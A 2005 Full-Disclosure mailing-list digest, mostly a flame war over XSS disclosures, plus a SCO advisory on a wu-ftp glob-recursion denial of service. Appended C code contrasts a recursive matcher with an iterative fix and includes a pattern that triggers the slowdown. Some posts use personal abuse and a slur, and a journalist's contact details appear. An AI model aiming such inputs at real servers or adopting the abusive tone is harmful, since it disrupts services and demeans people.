>require any skill at all to find those. show us some code! how many exploits did you write ?
>you are so blinded by your ego that you dont realize how much crap you talk and how you
>destroy your imaginary reputation yourself. why do you think there have been so many mails against you?
>its not because of your xss lameness. if you would have simply provided them to the list noone would have
>bothered, but you have to brag how special they would make you. then you think you would be one
>of the most respected security researchers out there, but noone knows you. you are so pathetic its unbelievable.
>pull the stick out of your ass and get lost kid.
>
>----- Original Message -----
>From: "n3td3v" <xploitable@...il.com>
>To: "GroundZero Security" <fd@....org>; <full-disclosure@...ts.grok.org.uk>
>Sent: Wednesday, December 21, 2005 6:16 PM
>Subject: Re: [Full-disclosure] XSS vulnerabilities in Google.com
>
>
> > You trolled this thread by saying Watchfire should stop disclosing
> > vulnerabilities for Yahoo and Google. You get the response you
> > deserved to get. Now you're running off the thread now with your tail
> > between your legs, because everyone has told you that Google and Yahoo
> > vulnerabilities (especially XSS) will never be banned from FD.
> >
> >
> > On 12/21/05, GroundZero Security <fd@....org> wrote:
> > > yes you are right, but its like if noone tells him what a stupid fag he is,
> > > he will keep posting and posting his irrelevant crap and just ignore the tons of private
> > > mail he receives. i'm sorry for adding to the noise, but its just too tempting.
> > > i try to ignore it. but i cant promise i will, the last mail he sent just asks for a reply :P
> > > but ok...must...resist.....
> > > btw my name is not groundzero, thats my company :)
> > >
> > > greetz
> > > -sk
> >
>
>
>------------------------------
>
>Message: 11
>Date: Wed, 21 Dec 2005 18:47:42 +0100
>From: Peer Janssen <peer@...en-online.de>
>Subject: [Full-disclosure] Character vulnerabilities
>To: full-disclosure@...ts.grok.org.uk
>Message-ID: <43A9953E.4020502@...en-online.de>
>Content-Type: text/plain; charset=us-ascii; format=flowed
>
>Hi list,
>
>I read so many postings on this list of people who seemingly do not
>control their anger, fury etc. which seems to bump their heads straight
>at their ceilings.
>
>Do you really consider this as qualities of a security
>researcher/consultant/employee/...?
>
>I'd rather consider them vulnerabilities which might expose them to
>social engineering attacks or to being blinded by their own rage, which
>can easily result in destructive carelessness in many areas.
>
>I don't think that it makes a good publicity for a company to work with
>security people not mastering themselves. Why would you entrust them
>with your systems if they react so emotionally? Shouldn't they rather be
>clear-minded, rational, controlling themselves, etc., when dealing in
>any way with security issues?
>
>So please, do yourself and those around you a favor and change; you CAN
>do it, and you will make everybody happier, and yourself more efficient,
>if happiness is not your thing.
>
>So cheer up, and take it a bit more easily!
>Peer
>
>
>
>------------------------------
>
>Message: 12
>Date: Wed, 21 Dec 2005 18:48:52 +0100
>From: fok yo <yoo.fok@...il.com>
>Subject: Re: [Full-disclosure] XSS vulnerabilities in Google.com
>To: n3td3v <xploitable@...il.com>
>Cc: full-disclosure@...ts.grok.org.uk
>Message-ID: <cd8f1f1e0512210948t3abdd6a8o@...l.gmail.com>
>Content-Type: text/plain; charset="iso-8859-1"
>
>You just don't get it, do you....
>The problem isn't xss bugs are the uberlamest, the problem is you reserve
>yourself the right to _spam_ us 24/7 by bragging about how once you found a
>half-ass xss yourself.
>Your signal to noise ratio is simply too low to be bearable.
>
>YOU HAVEN'T ADDED ANY *INTERESTING* SECURITY RELATED CONTENT TO THE LIST,
>EVER.
>YOU ARE USELESS TO THE SECURITY COMMUNITY AS A WHOLE.
>STOP REPLYING TO FD BECAUSE YOU ANNOY 99,99% OF US.
>WE DON'T NEED ANOTHER WANNABE.
>YOU WASTE OUR TIME.
>
>+ you are __very stupid__, you obviously lack the insight to be the top
>notch security pro you think you are, try something else, it's just not
>worth it, piece of fuckup.
>+ what's your real name? Stop hiding behind a nick and step into the
>ligths....
>+According to the way you express yourself through email (very simple
>language/grammar, especially for a native english speaker, bragging
>and trying to prove yourself without valid arguments, not going to the core
>of a discussion but trying to hide yourself after the image you think you
>created, ... ) , it's obvious you lack any social skills, stop wasting your
>time in front of the computer, find a date for new year's eve, coz it'll
>be cold and lonely.
>
>
>2005/12/21, n3td3v <xploitable@...il.com>:
> >
> > You trolled this thread by saying Watchfire should stop disclosing
> > vulnerabilities for Yahoo and Google. You get the response you
> > deserved to get. Now you're running off the thread now with your tail
> > between your legs, because everyone has told you that Google and Yahoo
> > vulnerabilities (especially XSS) will never be banned from FD.
> >
> >
> > On 12/21/05, GroundZero Security <fd@....org> wrote:
> > > yes you are right, but its like if noone tells him what a stupid fag he is,
> > > he will keep posting and posting his irrelevant crap and just ignore the tons of private
> > > mail he receives. i'm sorry for adding to the noise, but its just too tempting.
> > > i try to ignore it. but i cant promise i will, the last mail he sent just asks for a reply :P
> > > but ok...must...resist.....
> > > btw my name is not groundzero, thats my company :)
> > >
> > > greetz
> > > -sk
> >
>-------------- next part --------------
>An HTML attachment was scrubbed...
>URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20051221/3b9022b2/attachment-0001.html
>
>------------------------------
>
>Message: 13
>Date: Wed, 21 Dec 2005 11:54:05 -0600 (CST)
>From: "J.A. Terranson" <measl@....org>
>Subject: [Full-disclosure] [EMED-L] Patriot Act and HIPPA (fwd)
>To: Full-Disclosure <Full-Disclosure@...ts.grok.org.uk>
>Cc: antisocial@....org, "cypherpunks@...qaeda.net"
>	<cypherpunks@...qaeda.net>
>Message-ID: <20051221115344.H37487@...r.zsa.bet>
>Content-Type: TEXT/PLAIN; charset=US-ASCII
>
>
>Take note people!
>
>--
>Yours,
>
>J.A. Terranson
>sysadmin@....org
>0xBD4A95BF
>
>
>	Just once, can't we have a nice polite discussion about
>	the logistics and planning side of large criminal enterprise?
>
>	- Steve Thompson
>
>
>
>---------- Forwarded message ----------
>Date: Wed, 21 Dec 2005 12:10:59 -0500
>From: Jeanne Lenzer <jeanne.lenzer@...IL.COM>
>Reply-To: EMED-L -- a list for emergency medicine practitioners.
>     <EMED-L@...SRV1.UCSF.EDU>
>To: EMED-L@...SRV1.UCSF.EDU
>Subject: [EMED-L] Patriot Act and HIPPA
>
>Could anyone on this listserve who has seen anything like what follows
>below, please contact me off-list immediately jeanne.lenzer@...thlink.net
>(for background or for attribution - your choice).
>
>Thanks, Jeanne
>
>
>
>A patient was handed a medical information rights and disclosure booklet
>she got from her doctor. It lists the folks that they might
>release medical information to for various reasons (health department,
>lawyers and courts because of subpoena, law enforcement officials, coroners,
>medical examiners, funeral directors, etc.).
>Below them, there is this graph:
>
>Protective Services for the President, National Security and Intelligence
>Activities:
>We may disclose medical information about you to authorized federal
>officials so they may without limitation (i) provide protection to the
>President, other authorized persons or foreign heads of state or conduct
>special investigations, or (ii) conduct lawful intelligence,
>counter-intelligence, or other national security activities authorized by
>law.
>
>
>
>
>
>__________
>
>
>
>Jeanne Lenzer
>
>Freelance journalist
>
>11 Len Court
>
>Kingston, NY  12401
>
>USA
>
>jeanne.lenzer@...thlink.net
>
>845.943.6202 office
>
>203.300.7136 cell
>
>
>
>To unsubscribe, send the command  "SIGNOFF EMED-L" to LISTSERV@...SRV1.UCSF.EDU
>
>
>------------------------------
>
>Message: 14
>Date: Wed, 21 Dec 2005 18:57:18 +0100
>From: Slythers Bro <slythers@...il.com>
>Subject: Re: [Full-disclosure] Firewall (The Movie) -
>	http://firewallmovie.warnerbros.com/cmp/trailer.html?id=trailer
>To: Dave McCormick <mccormic@...u.net>
>Cc: full-disclosure@...ts.grok.org.uk
>Message-ID:
>	<8f6a58a30512210957v689c9804p373ec1febeef360d@...l.gmail.com>
>Content-Type: text/plain; charset="iso-8859-1"
>
>this movie seem to sux
>-------------- next part --------------
>An HTML attachment was scrubbed...
>URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20051221/c9ae0fc4/attachment-0001.html
>
>------------------------------
>
>Message: 15
>Date: Wed, 21 Dec 2005 17:58:27 +0000
>From: n3td3v <xploitable@...il.com>
>Subject: Re: [Full-disclosure] XSS vulnerabilities in Google.com
>To: Edward Pearson <Ed@...tymail.co.uk>,
>	full-disclosure@...ts.grok.org.uk
>Message-ID:
>	<4b6ee9310512210958p1775afb9g15f059db7775a6e@...l.gmail.com>
>Content-Type: text/plain; charset=ISO-8859-1
>
>I release information about Yahoo and Google, I don't see how my name
>goes in the same list as GroundZero and InfoSecBOFH. All i'm doing is
>defending Yahoo and Google researchers from being told not to disclose
>vulnerabilities on FD, is that such a bad thing?
>
>On 12/21/05, Edward Pearson <Ed@...tymail.co.uk> wrote:
> > Why has this become a trolling?
> > "if noone tell him what a stupid fag he is"
> > Are we back at fucking middle school? Have we descended to the level of
> > 10 year olds??
> >
> > Ground Zero, I've seen your company website(s) and your products. All I
> > say is I think you have several very good reasons to pay FUCKING close
> > attention to what is said on this list. Work it out.
> >
> > The only people who seem hell bent on ruining this list for everyone
> > are:
> > InfoSecBOFH
> > n3td3v
> > Ground Zero Security
> >
> > None of these people have anything to bring to the table.
> > Let's see at least one real vuln report/exploit from one of you, and then
> > the other two have to concentrate on growing up enough to not troll it
> > or make stupid pre-school comments.
> >
> > Come on guys!!! I'm beginning to think that actually you're not bigger
> > than this...
> >
> > Ultimately, if you've got problems with each other, do it on MSN, AIM,
> > IRC, USENET whatever, just not my inbox.
> >
> > Have a fucking excellent day.
> >
> > - Ed (BTW, Ground Zero's has my alias since 1995, now I see that this
> > chump is going round putting a black mark by it)
> >
> > -----Original Message-----
> > From: full-disclosure-bounces@...ts.grok.org.uk
> > [mailto:full-disclosure-bounces@...ts.grok.org.uk] On Behalf Of n3td3v
> > Sent: 21 December 2005 17:17
> > To: GroundZero Security; full-disclosure@...ts.grok.org.uk
> > Subject: Re: [Full-disclosure] XSS vulnerabilities in Google.com
> >
> > You trolled this thread by saying Watchfire should stop disclosing
> > vulnerabilities for Yahoo and Google. You get the response you deserved
> > to get. Now you're running off the thread now with your tail between
> > your legs, because everyone has told you that Google and Yahoo
> > vulnerabilities (especially XSS) will never be banned from FD.
> >
> >
> > On 12/21/05, GroundZero Security <fd@....org> wrote:
> > > yes you are right, but its like if noone tells him what a stupid fag
> > > he is, he will keep posting and posting his irrelevant crap and just
> > > ignore the tons of private mail he receives. i'm sorry for adding to
> > > the noise, but its just too tempting.
> > > i try to ignore it. but i cant promise i will, the last mail he sent
> > > just asks for a reply :P but ok...must...resist.....
> > > btw my name is not groundzero, thats my company :)
> > >
> > > greetz
> > > -sk
> >
> >
> >
>
>
>------------------------------
>
>Message: 16
>Date: Wed, 21 Dec 2005 12:58:32 -0500
>From: "KF (lists)" <kf_lists@...italmunition.com>
>Subject: Re: [Full-disclosure] SCOSA-2005.63 OpenServer 5.0.6
>	OpenServer 5.0.7	OpenServer 6.0.0 : wu-ftp Denial of Service
>	Vulnerability
>To: full-disclosure@...ts.grok.org.uk
>Cc: security-announce@...t.sco.com
>Message-ID: <43A997C8.1090903@...italmunition.com>
>Content-Type: text/plain; charset=ISO-8859-1; format=flowed
>
>How about you retards upgrade your own production ftp servers before
>sending out another wu advisory...
>
>Seriously.... how many years can you leave this box unpatched? Looks like
>you JUST released yet another patch that you can apply to it...
>
>ftp ftpput.sco.com
>Connected to ftpput.sco.com.
>220 artemis FTP server (Version 2.1WU(1)) ready.
>Name (ftpput.sco.com:kfinisterre):
>
>-KF
>
>security@....com wrote:
>
> > -----BEGIN PGP SIGNED MESSAGE-----
> > Hash: SHA1
> >
> > ______________________________________________________________________________
> >
> >
> >             SCO Security Advisory
> >
> > Subject:        OpenServer 5.0.6 OpenServer 5.0.7 OpenServer 6.0.0 :
> > wu-ftp Denial of Service Vulnerability
> > Advisory number:    SCOSA-2005.63
> > Issue date:        2005 December 21
> > Cross reference:    sr893936 fz532335 erg712856
> >             sr895049 fz533027 erg712952
> >             CVE-2005-0256
> > ______________________________________________________________________________
> >
> >
> >
> > 1. Problem Description
> >
> >     The wu_fnmatch function in wu_fnmatch.c allows remote attackers
> >     to cause a denial of service (CPU exhaustion by recursion) via a
> >     glob pattern with a large number of * (wildcard) characters, as
> >     demonstrated using the dir command.
> >
> >     The Common Vulnerabilities and Exposures project (cve.mitre.org)
> >     has assigned the following name CVE-2005-0256 to this issue.
> >
> >
> > 2. Vulnerable Supported Versions
> >
> >     System                Binaries
> >     ----------------------------------------------------------------------
> >
> >     OpenServer 5.0.6         /etc/ftpd
> >     OpenServer 5.0.7         /etc/ftpd
> >     OpenServer 6.0.0         /etc/ftpd
> >
> >
> > 3. Solution
> >
> >     The proper solution is to install the latest packages.
> >
> >
> > 4. OpenServer 5.0.6
> >
> >     4.1 Location of Fixed Binaries
> >
> >     ftp://ftp.sco.com/pub/updates/OpenServer/SCOSA-2005.63
> >
> >
> >     4.2 Verification
> >
> >     MD5 (p532335.506_vol.tar) = 89ea2ed1f88da6721bd73c3889f9ac0c
> >
> >     md5 is available for download from
> >         ftp://ftp.sco.com/pub/security/tools
> >
> >
> >     4.3 Installing Fixed Binaries
> >
> >     The following package should be installed on your system before you
> >     install this fix:
> >
> >         OSS646C
> >
> >     Upgrade the affected binaries with the following sequence:
> >
> >     1) Download p532335.506_vol.tar to a directory.
> >
> >     2) Extract VOL* files.
> >
> >        # tar xvf p532335.506_vol.tar
> >
> >     3) Run the custom command, specify an install
> >        from media images, and specify the directory as
> >        the location of the images.
> >
> >
> > 5. OpenServer 5.0.7
> >
> >     5.1 Location of Fixed Binaries
> >
> >     The fixes are only available in SCO OpenServer Release 5.0.7
> >     Maintenance Pack 4 or later.
> >
> >     ftp://ftp.sco.com/pub/openserver5/507/mp/osr507mp4/osr507mp4_vol.tar
> >
> >
> >     5.2 Verification
> >
> >     MD5 (osr507mp4_vol.tar) = 4c87d840ff5b43221258547d19030228
> >
> >     md5 is available for download from
> >         ftp://ftp.sco.com/pub/security/tools
> >
> >
> >     5.3 Installing Fixed Binaries
> >
> >     See the SCO OpenServer Release 5.0.7 Maintenance Pack 4 Release
> >     and Installation Notes:
> >
> >     ftp://ftp.sco.com/pub/openserver5/507/mp/osr507mp4/osr507mp4.htm
> >
> >
> > 6. OpenServer 6.0.0
> >
> >     6.1 Location of Fixed Binaries
> >
> >     ftp://ftp.sco.com/pub/updates/OpenServer/SCOSA-2005.63
> >
> >
> >     6.2 Verification
> >
> >     MD5 (p533027.600_vol.tar) = d939cb729d115c9bef2d2032903f2125
> >
> >     md5 is available for download from
> >         ftp://ftp.sco.com/pub/security/tools
> >
> >
> >     6.3 Installing Fixed Binaries
> >
> >     Upgrade the affected binaries with the following sequence:
> >
> >     1) Download p533027.600_vol.tar to a directory.
> >
> >     2) Extract VOL* files.
> >
> >        # tar xvf p533027.600_vol.tar
> >
> >     3) Run the custom command, specify an install
> >        from media images, and specify the directory as
> >        the location of the images.
> >
> >
> > 7. References
> >
> >     Specific references for this advisory:
> >         http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0256
> >
> >         http://www.idefense.com/application/poi/display?id=207&type=vulnerabilities
> >
> >
> >     SCO security resources:
> >         http://www.sco.com/support/security/index.html
> >
> >     SCO security advisories via email
> >         http://www.sco.com/support/forums/security.html
> >
> >     This security fix closes SCO incidents sr893936 fz532335
> >     erg712856 sr895049 fz533027 erg712952.
> >
> >
> > 8. Disclaimer
> >
> >     SCO is not responsible for the misuse of any of the information
> >     we provide on this website and/or through our security
> >     advisories. Our advisories are a service to our customers
> >     intended to promote secure installation and use of SCO
> >     products.
> >
> >
> > 9. Acknowledgments
> >
> >     SCO would like to thank Adam Zabrocki.
> >
> > ______________________________________________________________________________
> >
> > -----BEGIN PGP SIGNATURE-----
> > Version: GnuPG v1.4.2 (UnixWare)
> >
> > iD8DBQFDqYDTaqoBO7ipriERAtzOAJ0ctD8xRYQrLkkgyHsMqCvfQdPBFQCeIgx7
> > xqqmzQCNiw6t+WtSL5rqo4E=
> > =ha4X
> > -----END PGP SIGNATURE-----
> >
> >
> >
>
>
>
>------------------------------
>
>Message: 17
>Date: Wed, 21 Dec 2005 11:09:08 -0700
>From: "wilder_jeff Wilder" <wilder_jeff@....com>
>Subject: RE: [Full-disclosure] Character vulnerabilities
>To: peer@...en-online.de, full-disclosure@...ts.grok.org.uk
>Message-ID: <BAY106-F7F86FB6686789F08B721B94310@....gbl>
>Content-Type: text/plain; format=flowed
>
><begin applause>
>
>        WOOO HOOOOO!!!!! I'll second that
>
></begin applause>
>
>
>
>
>-Jeff Wilder
>CISSP,CCE,C/EH
>
>
>
>-----BEGIN GEEK CODE BLOCK-----
>   Version: 3.1
>	GIT/CM/CS/O d- s:+ a C+++ UH++ P L++ E- w-- N+++ o-- K- w O- M--
>	V-- PS+ PE- Y++ PGP++ t+ 5- X-- R* tv b++ DI++ D++
>	G e* h--- r- y+++*
>------END GEEK CODE BLOCK------
>
>
>
>
>
> >From: Peer Janssen <peer@...en-online.de>
> >Reply-To: peer@...en-online.de
> >To: full-disclosure@...ts.grok.org.uk
> >Subject: [Full-disclosure] Character vulnerabilities
> >Date: Wed, 21 Dec 2005 18:47:42 +0100
> >
> >Hi list,
> >
> >I read so many postings on this list of people who seemingly do not control
> >their anger, fury etc. which seems to bump their heads straight at their
> >ceilings.
> >
> >Do you really consider this as qualities of a security
> >researcher/consultant/employee/...?
> >
> >I'd rather consider them vulnerabilities which might expose them to social
> >engineering attacks or to being blinded by their own rage, which can easily
> >result in destructive carelessness in many areas.
> >
> >I don't think that it makes a good publicity for a company to work with
> >security people not mastering themselves. Why would you entrust them with
> >your systems if they react so emotionally? Shouldn't they rather be
> >clear-minded, rational, controlling themselves, etc., when dealing in any
> >way with security issues?
> >
> >So please, do yourself and those around you a favor and change; you CAN do
> >it, and you will make everybody happier, and yourself more efficient, if
> >happiness is not your thing.
> >
> >So cheer up, and take it a bit more easily!
> >Peer
> >
>
>
>
>
>------------------------------
>
>Message: 18
>Date: Wed, 21 Dec 2005 19:14:28 +0100
>From: "GroundZero Security" <fd@....org>
>Subject: Re: [Full-disclosure] XSS vulnerabilities in Google.com
>To: "Edward Pearson" <Ed@...tymail.co.uk>
>Cc: full-disclosure@...ts.grok.org.uk
>Message-ID: <019601c6065a$63bf69f0$0100a8c0@...learwinter>
>Content-Type: text/plain;	charset="iso-8859-1"
>
>i did provide a real exploit before here and before you
>point the finger on others, we didnt see anything coming from you at all did we ?
>
>----- Original Message -----
>From: "Edward Pearson" <Ed@...tymail.co.uk>
>To: <full-disclosure@...ts.grok.org.uk>
>Sent: Wednesday, December 21, 2005 6:41 PM
>Subject: RE: [Full-disclosure] XSS vulnerabilities in Google.com
>
>
> > Why has this become a trolling?
> > "if noone tell him what a stupid fag he is"
> > Are we back at fucking middle school? Have we descended to the level of
> > 10 year olds??
> >
> > Ground Zero, I've seen your company website(s) and your products. All I
> > say is I think you have several very good reasons to pay FUCKING close
> > attention to what is said on this list. Work it out.
> >
> > The only people who seem hell bent on ruining this list for everyone
> > are:
> > InfoSecBOFH
> > n3td3v
> > Ground Zero Security
> >
> > None of these people have anything to bring to the table.
> > Let's see at least one real vuln report/exploit from one of you, and then
> > the other two have to concentrate on growing up enough to not troll it
> > or make stupid pre-school comments.
> >
> > Come on guys!!! I'm beginning to think that actually you're not bigger
> > than this...
> >
> > Ultimately, if you've got problems with each other, do it on MSN, AIM,
> > IRC, USENET whatever, just not my inbox.
> >
> > Have a fucking excellent day.
> >
> > - Ed (BTW, Ground Zero's has my alias since 1995, now I see that this
> > chump is going round putting a black mark by it)
> >
> > -----Original Message-----
> > From: full-disclosure-bounces@...ts.grok.org.uk
> > [mailto:full-disclosure-bounces@...ts.grok.org.uk] On Behalf Of n3td3v
> > Sent: 21 December 2005 17:17
> > To: GroundZero Security; full-disclosure@...ts.grok.org.uk
> > Subject: Re: [Full-disclosure] XSS vulnerabilities in Google.com
> >
> > You trolled this thread by saying Watchfire should stop disclosing
> > vulnerabilities for Yahoo and Google. You get the response you deserved
> > to get. Now you're running off the thread now with your tail between
> > your legs, because everyone has told you that Google and Yahoo
> > vulnerabilities (especially XSS) will never be banned from FD.
> >
> >
> > On 12/21/05, GroundZero Security <fd@....org> wrote:
> > > yes you are right, but its like if noone tells him what a stupid fag
> > > he is, he will keep posting and posting his irrelevant crap and just
> > > ignore the tons of private mail he receives. i'm sorry for adding to
> > > the noise, but its just too tempting.
> > > i try to ignore it. but i cant promise i will, the last mail he sent
> > > just asks for a reply :P but ok...must...resist.....
> > > btw my name is not groundzero, thats my company :)
> > >
> > > greetz
> > > -sk
> >
> >
> >
>
>
>------------------------------
>
>Message: 19
>Date: Wed, 21 Dec 2005 18:24:33 +0000
>From: n3td3v <xploitable@...il.com>
>Subject: Re: [Full-disclosure] XSS vulnerabilities in Google.com
>To: GroundZero Security <fd@....org>,
>	full-disclosure@...ts.grok.org.uk
>Message-ID:
>	<4b6ee9310512211024m31d67709mc40a53b89fb05923@...l.gmail.com>
>Content-Type: text/plain; charset=ISO-8859-1
>
>Its a disgrace that its come to people like GroundZero knocking
>others, I really do. You've never disclosed any vulnerabilities, yet
>you think you can tell other people not to post their own just because
>you so happen to think its lame.  Pathetic.
>
>On 12/21/05, GroundZero Security <fd@....org> wrote:
> > i did provide a real exploit before here and before you
> > point the finger on others, we didnt see anything coming from you at all did we ?
>
>
>------------------------------
>
>
>End of Full-Disclosure Digest, Vol 10, Issue 70
>***********************************************
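
The SCO advisory quoted in this digest (SCOSA-2005.63) attributes the wu-ftp denial of service to recursion on `*` in a glob matcher. The C below is an added illustration, not code from wu-ftpd or from any poster in this digest: a simplified recursive matcher (only `*` and `?`) beside an iterative one with the same results, plus a step counter to compare their cost; all function names and the sample pattern and name are constructed for this example.

```c
#include <stdio.h>

/* Calls/iterations made by the matcher under test (reset by cost()). */
static unsigned long steps;

/* Recursive matcher for '*' and '?' only. Each '*' retries the rest of the
 * pattern at every remaining position of the name, so k stars over a name of
 * length n that never matches cost on the order of n^k calls. */
static int match_recursive(const char *p, const char *s)
{
    steps++;
    if (*p == '\0')
        return *s == '\0';
    if (*p == '*') {
        for (;; s++) {
            if (match_recursive(p + 1, s))
                return 1;
            if (*s == '\0')
                return 0;
        }
    }
    if (*s != '\0' && (*p == '?' || *p == *s))
        return match_recursive(p + 1, s + 1);
    return 0;
}

/* Iterative matcher with the same results. Only the most recent '*' is
 * remembered: on a mismatch it absorbs one more character and matching
 * resumes after it. Worst case is O(len(pattern) * len(name)). */
static int match_iterative(const char *p, const char *s)
{
    const char *star = NULL;   /* pattern position just after the last '*' */
    const char *resume = NULL; /* name position where that '*' currently ends */

    while (*s != '\0') {
        steps++;
        if (*p == '*') {
            while (*p == '*')  /* a run of stars behaves like one star */
                p++;
            star = p;
            resume = s;
        } else if (*p == '?' || *p == *s) {
            p++;
            s++;
        } else if (star != NULL) {
            p = star;          /* let the last star swallow one more char */
            s = ++resume;
        } else {
            return 0;
        }
    }
    while (*p == '*')
        p++;
    return *p == '\0';
}

typedef int (*matcher_fn)(const char *, const char *);

/* Number of steps a matcher spends on one pattern/name pair. */
static unsigned long cost(matcher_fn fn, const char *pattern, const char *name)
{
    steps = 0;
    (void)fn(pattern, name);
    return steps;
}

/* Constructed sample input: five "*a" groups, then "*b", against a name of
 * 20 'a' characters that can never match. */
static const char SAMPLE_PATTERN[] = "*a*a*a*a*a*b";
static const char SAMPLE_NAME[] = "aaaaaaaaaaaaaaaaaaaa";

int main(void)
{
    printf("recursive: match=%d steps=%lu\n",
           match_recursive(SAMPLE_PATTERN, SAMPLE_NAME),
           cost(match_recursive, SAMPLE_PATTERN, SAMPLE_NAME));
    printf("iterative: match=%d steps=%lu\n",
           match_iterative(SAMPLE_PATTERN, SAMPLE_NAME),
           cost(match_iterative, SAMPLE_PATTERN, SAMPLE_NAME));
    return 0;
}
```

Each extra `*a` group or longer name multiplies the recursive matcher's work, while the iterative matcher's step count grows only with the product of the two lengths.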
